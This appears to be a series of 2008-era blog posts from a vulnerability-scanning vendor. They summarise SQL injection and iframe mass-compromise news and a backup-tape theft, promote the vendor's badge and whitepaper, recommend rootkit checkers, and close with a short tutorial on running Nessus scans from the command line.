A simple SQL injection has resulted in more than 500′000 websites being compromised with a javascript include that sends visitors to the hacked websites to other sites containing malware that attempts to infect the client.

Yet another example of simple security errors resulting in mass hacks of websites that whose ultimate purpose is the installation of trojans onto end user machines. The trojans can then be used in bot armies or for collection of data, passwords, financial accounts from keys stroke loggers.

As more and more websites are using database back-ends to make them faster and more dynamic, it also means that it’s crucial to verify what information gets stored in or requested from those databases — especially if you allow users to upload content themselves which happens all the time in discussion forums, blogs, feedback forms, et cetera.

Unless that data is sanitized before it gets saved you can’t control what the website will show to the users. This is what SQL injection is all about, exploiting weaknesses in these controls.

F-Secure Details of the hack
Sans Article

As we often mention here at HackerTarget.com real security is made up of a number of different processes, policies and technologies. If one part of the security picture is missing then your data is vulnerable. Where do you keep your backups? Are they in a secure location? While this example is a fairly rare occurrence, it is a good reminder about backup security.

“A vehicle used by an off-site archive company to transport patient data was broken into on March 17. The University of Miami just made the theft public last week, saying the thieves removed a transport case carrying the school’s six computer backup tapes. On those tapes were more than 2 million medical records. In fact, the archive company waited 48 hours before notifying the university itself. A University spokeswoman said the school has stopped shipping backup tapes off-site for now.”

Slashdot Discussion

A tool discovered by Sans Security Handlers has shed some light on how 10000 web sites were compromised earlier this year. An automated SQL injection attack that utilized google searches against ASP pages that contained potential sql injection points is at the core of the attack.

While we had a general idea about what they do during these attacks, and we knew that they were automated, we did not know exactly how the attacks worked, or what tools the attackers used. The strategy was relatively simple: they used search engines in order to find potentially vulnerable applications and then tried to exploit them. The exploit just consisted of an SQL statement that tried to inject a script tag into every HTML page on the web site.

Full details over at Sans.org

The new Security Scanned Badge from HackerTarget.com is a badge that can be placed on the website of users of our services. This badge is a clear statement to the customer or client that the website in question takes its security seriously.

There is no ongoing costs associated with the use of the badge it is merely an easy way to show your customers your clients that you care about the privacy and security of them and your business.

Customers have demanded it and we have responded with this new offer.

A customer that is confident in your site is a happy customer.

Example:

Further information about the Badge

A quick note to tell about our latest updates. A few days ago we released a new whitepaper outlining the advantages of using vulnerability scanning solutions that are based in the “Cloud”. What is the cloud? It is the internet, but it is more - it is a utility based computing service that is just available. The servers could be anywhere and diverse but the cloud and seamless application that runs within it is important. How’s that for an off the cuff definition. It is late on a Friday night so forgive me if it makes no sense and try Googling Cloud computing.

Website updates, there have been a couple of changes to the front page to make the service offerings clearer. You will also notice an exciting addition that is the new Free Nessus Scanning option for non-profit organizations that is part of our initiative to assist nonprofit organizations in having a secure information technology environment.

And lastly we have recently updated Nmap to version 4.60 which gives a bunch of new benefits to our free nmap scans. You will notice much better version detection of services amongst other things. Go here for the full change log.

A good summary of the two top root kit hunters for linux hosts.

Rkhunter and chkrootkit are tools to check for signs of a rootkit. They will inspect the system they’re running on and report anomalies either through the shell or via email.

Although an attacker able to install a rootkit is likely also able to easily escape or delete these tools, not every attacker is a skilful one. Not every script kiddie knows about these tools or the way to cover its tracks. Since every single error can make the difference, on either sides, an effortless passive protection can do no harm and adds one more (maybe thin) layer of security.

Both rkhunter and chkrootkit, indeed, can be deployed quickly and require little management effort.

http://debaday.debian.net/2008/02/06/rkhunter-chkrootkit-wise-crackers-only/

A new release from HackerTarget.com a whitepaper “Security from the Cloud” focusing on the reasons why vulnerability scanning out of the cloud makes so much sense. Check it out.

This white paper describes advantages of using a remote Vulnerability Scanning Service that is contained within the  “Cloud”. A service that is available from anywhere by any systems fully contained as a remote entity and managed by a third party. Using Open Source Vulnerability Analysis tools the Security from the Cloud is peer reviewed, open and world class. While acknowledging that Vulnerability Analysis is only a part of the solution to securing your server, it is clear that a well defined ongoing vulnerability assessment policy is a step in the right direction.

Security from the Cloud - Whitepaper

I stumbled across some interesting reading around open source vs commercial and the future of web application scanning. From the Watchfire blog there is a good discussion with an interesting post and some good comments.

A near perfect web application security site testing tool is a difficult thing to achieve, I liken it to the elusive antivirus heuristics which occasionally pops up - yet we are still reliant upon signature based methods for Antivirus and Malware detection. At present the online tools here at HackerTarget.com are also based around scanning for known issues with particular configurations or applications / servers. SQLiX does do a crawl of your site looking for obvious SQL injection points and is pretty good at picking up the obvious ones.

The tools we have here such as Nessus and Nikto, and of course Nmap are the best at what they do. However they will not fully test your custom built web application for security holes.

For a real test of custom web code, nothing can beat trained and experienced web application testing specialists doing manual tests with a little help from some specific tools.

For more information on web application security testing there is an excellent collection of web application testing links over at http://owasp.org.

http://blog.watchfire.com/wfblog/2007/07/my-wish-for-ope.html

http://www.owasp.org/index.php/Phoenix/Tools

The iFrame attacks that have made news in recent weeks are spreading to more prominent websites.  Among the sites infected are USA Today, Target, and Wal-Mart.  The most recent attack targets search engine results; the results are manipulated so that users are likely to visit sites that have been infected with malware.
http://www.news.com/8301-10784_3-9905951-7.html?part=rss&subj=news&tag=2547-1_3-0-20
http://ddanchev.blogspot.com/2008/03/massive-iframe-seo-poisoning-attack.html

http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9073098&source=rss_topic17
http://www.vnunet.com/vnunet/news/2213090/search-engine-attack-lingers

The trend of drive by downloads from compromised websites continues or in this case compromised hosts hold the malware, with search engine optimization is driving people to them. Malware is a big money game - it is not going away any time soon. As always keep your servers secure and your desktops patched.

Now that we have outlined the basics of the command line nmap scan (remember that when it comes to security tools the gui is for chumps) I will now go on and build on that knowledge with some Nessus command line ninja moves.

Firstly you need to install your Nessus Server onto your linux box. Just follow the instructions as this is not too difficult and it is covered in many other places.

Now that you have Nessus server installed we want to start some scans, but instead of using the Gui client we are going to go a step further and use the command line nesssus as our client. Actually the Nessus gui is quite a good little tool and I have used it many times. The command line tool is appropriate for running scans from remote linux servers that you and for scripting the scans (just like http://www.hackertaget.com does!).

nessus, version 3.0.6.

Common options :
nessus [-vnh] [-c .rcfile] [-V] [-T <format>]
Batch-mode scan:
nessus -q [-pPS] <host> <port> <user> <pass> <targets-file> <result-file>
Report conversion :
nessus -i in.[nsr|nbe] -o out.[xml|nsr|nbe|html|txt]

General options :
-v : shows version number
-h : shows this help
-T : Output format: ‘nbe’, ‘nsr’, ‘html’, ‘xml’ or ‘txt’
-V : make the batch mode display status messages
to the screen.
-x : override SSL “paranoia” question preventing nessus from
checking certificates.

The batch mode (-q) arguments are :
host     : nessusd host
port     : nessusd host port
user     : user name
pass     : password
targets  : file containing the list of targets
result   : name of the file where
nessus will store the results
-p       : obtain list of plugins installed on the server.
-P       : obtain list of server and plugin preferences.
-S       : issue SQL output for -p and -P (experimental).
-l       : Display license information

Now for an example:

nessus -q -x -T html 192.168.1.1 1241 admin adminpassword filewithtargets.txt resultsfile.html

Using the command line version of nessus can be a very helpful and time saving trick to help you stay secure.